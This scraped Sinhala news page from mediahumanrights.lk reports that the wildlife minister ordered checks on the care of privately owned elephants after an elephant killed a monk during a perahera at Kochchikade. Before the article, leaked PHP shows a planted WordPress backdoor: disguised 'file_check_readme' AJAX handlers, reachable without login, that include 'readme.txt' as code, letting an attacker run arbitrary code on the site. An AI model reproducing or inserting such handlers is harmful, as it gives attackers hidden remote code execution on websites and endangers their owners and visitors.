if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අලි ඇතුන් බලා ගැනීමේ හරි ක්‍රමය ගැන සොයයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

අලි ඇතුන් බලා ගැනීමේ හරි ක්‍රමය ගැන සොයයි

නීතිමය පදනම මත පුද්ගලික හිමිකාරිත්වයට යටතේ අලි ඇතුන් නිසි පරිදි රැකබලා ගැනීම නිවැරදිව සිදුවන්නේ ද යන්න පිළිබඳ සෙවීමට අවශ්‍ය ක්‍රියාමාර්ග ගන්නා ලෙස තිරසර සංවර්ධන හා වනජිවි අමාත්‍ය ගාමිණි ජයවික්‍රම පෙරේරා මහතා නිලධාරින්ට උපදෙස් ලබා දී තිබේ.
කොච්චිකඩේ ප්‍රදේශයේ විහාරස්ථානයක පැවති පෙරහැරක් අතරතුර ඇතින්නක් පහරදීමෙන් හිමිනමක් අපවත්වීම සම්බන්ධයෙන් නිවේදනයක් නිකුත් කරමින් අමාත්‍යවරයා මෙම අදහස් පළ කළේය.
අදාළ සිදුවීම සම්බන්ධයෙන් තමා දැඩි ලෙස කණගාටුවට පත් වන බව ද අමාත්‍යවරයා මෙහිදී පවසා තිබේ.
නුපුහුණු සේවකයන් යටතේ අලි ඇතුන් ඇති දැඩිවිම මෙවැනි අවාසනාවන්ත සිදුවීම්වලට මුල්වන බව ද අමාත්‍යවරයා මෙහිදී පෙන්වා දී ඇත.
මේ සම්බන්ධයෙන් අද දෙරණ සමඟ කරුණු පැහැදිලි කළ තිරසර සංවර්ධන හා වනජිවි නියෝජ්‍ය අමාත්‍ය සුමේධා ජි.ජයසේන මහත්මිය පෙරහැර සඳහා අලි ඇතුන් ලබාදීමේ දී සැලකිලිමත් විය යුතු කරුණු සම්බන්ධයෙන් ද අදහස් ප්‍රකාශ කළාය.

(under the courtesy of adaderana news web)

Related posts

විදේශවල සිරවී සිටින ලාංකිකයන් දහඅට දහසක් ගෙන්න රජය සූදානම්..

Shiran Viraj

කොමර්ෂල් බැංකුවෙනුත් කොරෝනා.. වසා දමයි..

Shiran Viraj

දැන් තියෙන ගොසිප් නිසා ආදර සම්බන්ධයක් පටන් ගන්නත් බෑ

Shiran Viraj